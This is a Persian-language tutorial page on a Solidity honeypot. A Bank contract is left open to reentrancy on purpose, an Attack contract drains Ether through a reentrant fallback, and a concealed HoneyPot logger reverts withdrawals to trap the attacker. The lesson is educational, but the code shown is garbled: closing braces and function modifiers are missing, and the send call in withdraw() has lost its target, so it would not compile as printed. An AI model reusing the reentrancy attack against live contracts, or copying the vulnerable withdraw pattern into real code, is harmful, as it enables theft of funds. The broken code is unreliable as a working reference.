Siblearn Academy siblearn academy


هانی پات تله ای برای گرفتن هکرها است.

با ترکیب دو اکسپلویت، ورود مجدد و پنهان کردن کدهای مخرب، می‌توانیم قرارداد بسازیم

که کاربران مخرب را دستگیر می کند.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

Bank is a contract that calls Logger to log events.
Bank.withdraw() is vulnerable to the reentrancy attack.
So a hacker tries to drain Ether from Bank.
But actually the reentracy exploit is a bait for hackers.
By deploying Bank with HoneyPot in place of the Logger, this contract becomes
a trap for hackers. Let's see how.

1. Alice deploys HoneyPot
2. Alice deploys Bank with the address of HoneyPot
3. Alice deposits 1 Ether into Bank.
4. Eve discovers the reentrancy exploit in Bank.withdraw and decides to hack it.
5. Eve deploys Attack with the address of Bank
6. Eve calls Attack.attack() with 1 Ether but the transaction fails.

What happened?
Eve calls Attack.attack() and it starts withdrawing Ether from Bank.
When the last Bank.withdraw() is about to complete, it calls logger.log().
Logger.log() calls HoneyPot.log() and reverts. Transaction fails.

contract Bank {
    mapping(address => uint256) public balances;
    Logger logger;

    constructor(Logger _logger) {
        logger = Logger(_logger);

    function deposit() public payable {
        balances[msg.sender] += msg.value;
        logger.log(msg.sender, msg.value, "Deposit");

    function withdraw(uint256 _amount) public {
        require(_amount <= balances[msg.sender], "Insufficient funds");

        (bool sent,) ={value: _amount}("");
        require(sent, "Failed to send Ether");

        balances[msg.sender] -= _amount;

        logger.log(msg.sender, _amount, "Withdraw");

contract Logger {
    event Log(address caller, uint256 amount, string action);

    function log(address _caller, uint256 _amount, string memory _action)
        emit Log(_caller, _amount, _action);

// Hacker tries to drain the Ethers stored in Bank by reentrancy.
contract Attack {
    Bank bank;

    constructor(Bank _bank) {
        bank = Bank(_bank);

    fallback() external payable {
        if (address(bank).balance >= 1 ether) {
            bank.withdraw(1 ether);

    function attack() public payable {
        bank.deposit{value: 1 ether}();
        bank.withdraw(1 ether);

    function getBalance() public view returns (uint256) {
        return address(this).balance;

// Let's say this code is in a separate file so that others cannot read it.
contract HoneyPot {
    function log(address _caller, uint256 _amount, string memory _action)
        if (equal(_action, "Withdraw")) {
            revert("It's a trap");

    // Function to compare strings using keccak256
    function equal(string memory _a, string memory _b)
        returns (bool)
        return keccak256(abi.encode(_a)) == keccak256(abi.encode(_b));

روی محیط توسعه ی Remix امتحان بکنید

  • HoneyPot.sol
  • بازگشت به لیست